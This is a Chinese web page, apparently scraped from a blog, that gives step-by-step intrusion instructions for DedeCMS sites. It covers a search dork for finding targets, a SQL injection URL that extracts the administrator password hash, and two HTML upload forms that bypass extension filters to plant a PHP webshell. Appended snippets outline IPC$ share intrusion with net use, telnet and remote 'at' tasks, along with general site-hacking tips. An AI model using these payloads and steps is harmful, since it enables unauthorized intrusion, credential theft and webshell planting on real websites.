dede入侵步骤

--------------------------------------------------------
情简单整理下入侵测试的步骤:
漏洞利用实例
百度搜索关键字"Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc",获得使用DeDeCMS系统的网站。
注入漏洞。首先访问"/data/admin/ver.txt"页面获取系统最后升级时间,XXXXX说明已经修补2011年8月12日补丁,

然后访问"/member/ajax_membergroup.php?action=post&membergroup=1"页面,XXXXXX2说明存在该漏洞。
于是访问页面链接"/member/ajax_membergroup.php?action=post&[email protected]`‘` Union select pwd from `%[email protected]__admin` where 1 or [email protected]`‘`",
去掉前三位和最后一位,得到管理员的16位MD5码,www.cmd5.com在线破解成功。

上传漏洞。

要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,只要登陆会员中心,然后访问页面链接
"/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post",
说明通过"/plus/carbuyaction.php"已经成功调用了上传页面"/dialog/select_soft_post"

于是将Php一句话木马扩展名改为"rar"等,利用提交页面upload1.htm,

将下面的源码另存为upload1.htm,获得提交页面如图下。
<form
action="[url=http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post]
http://127.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post[/url]" method="post"
enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
1,必须登陆用户。
2,将待上传PHP文件扩展名改为"zip|gz|rar|iso|doc|xsl|ppt|wps"其中之一。
3,newname为上传后的新文件名,扩展名使用大写绕过,如"Php"

提交后尽管页面出错,但是myfile.Php文件已经成功上传到网站根目录。

upload2.htm
<form name="form1" action="http://127.1/member/uploads_add.php" method="post" enctype="multipart/form-data" >
<input type="hidden" name="mediatype" value="4" />
<input type="hidden" name="_GET[cfg_mb_addontype]" value="P hp|Php|php" />
<input type="hidden" name="dopost" value="save" />
<input name="addonfile" type="file" id="addonfile" />
<button class="button2" type="submit" >提交</button>
</form>

时间: 2024-10-08 08:00:58

dede入侵步骤的相关文章

ipc 入侵步骤

第一步:建立IPC隧道net use \\10.56.204.186\IPC$ "密码" /user:"用户"      第二步:映射对方c盘到本地z盘net use z: \\10.56.204.186\c$ 第三步:将sys.bat脚本复制到共享根目录下@net start telnet 第四步:查看 10.56.204.186 当前时间net time \\10.56.204.186 第五步:添加远程任务at \\10.56.204.186 11:00(时间)

安装dede的步骤

1去官网下载最新版的织梦系统,选择需要的语言版本,一种是GBK的,如果你的网站仅仅死面度中国的,只有中文内容的就选择GBK:一种是UTF-8的,如果你的站是面对世界的,有别的语言的,那么最好选用UTF-8版本的 2.下载完后解压,然后把Uploads那个文件夹里的文件都上传到你的空间里,最好用Filezilla上传,上传到Web文件夹下,这个工具特别方便,而且速度很快 3.开始安装织梦系统,首先打开浏览器,输入你的域名,然后后面加个斜杠"/install/“,再是回车,然后就会出现下面的界面,勾

445port入侵具体解释

445port入侵具体解释   关于"445port入侵"的内容445port入侵具体解释本站搜索很多其它关于"445port入侵"的内容 445port入侵,在这之前我们首先要看的还是445port为什么回成为入侵的port呢?445port就是IPC 服务的默认port                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会话 四 空会话能够做什

445port入侵详细解释

445port入侵详细解释   大约"445port入侵"内容445port入侵详细解释网站搜索许多其他的"445port入侵"内容 445port入侵,以前我们先来看看或445port早干嘛去了,成为侵入port呢?445port就是IPC 服务的默认port                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会话 四 空会话能够做什么 五 ip

局域网入侵检测过程详解

首先申明: 1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),或已知道账号密码 并且开了139端口,但没开防火墙的机子. 入侵工具:一般要用到三个:NTscan变态扫描器,Recton–D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀.) 入侵步骤:1.使用”NTscan变态扫描器”,在IP处填上要扫描的

入侵的实践总结经验

1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传 shell ,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在 asp 居多! 2.asp ( aspx )+MSSQL 先考虑注入,一般的注入都有 DBowner 权限可以直接写 shell :如果写不了,或者 web 与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件: 3.asp ( aspx )+ACCESS 拿 shell 一般只有

黑客入侵的常法

1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传 shell ,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在 asp 居多! 2.asp ( aspx )+MSSQL 先考虑注入,一般的注入都有 DBowner 权限可以直接写 shell :如果写不了,或者 web 与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件: 3.asp ( aspx )+ACCESS 拿 shell 一般只有

别人的入侵笔记二

1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多! 2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell:如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件: 3.asp(aspx)+ACCESS拿shell一般只有3种方法,一是前台上传或者注入进后台上传

hacker &nbsp; start.................

1,ping一下,如果返回的TTL在0和100之间,表示是windows主机,如果在200和300之间,表示是linux和unix主机. 2,黑客跳板技术 3,PC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问.IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建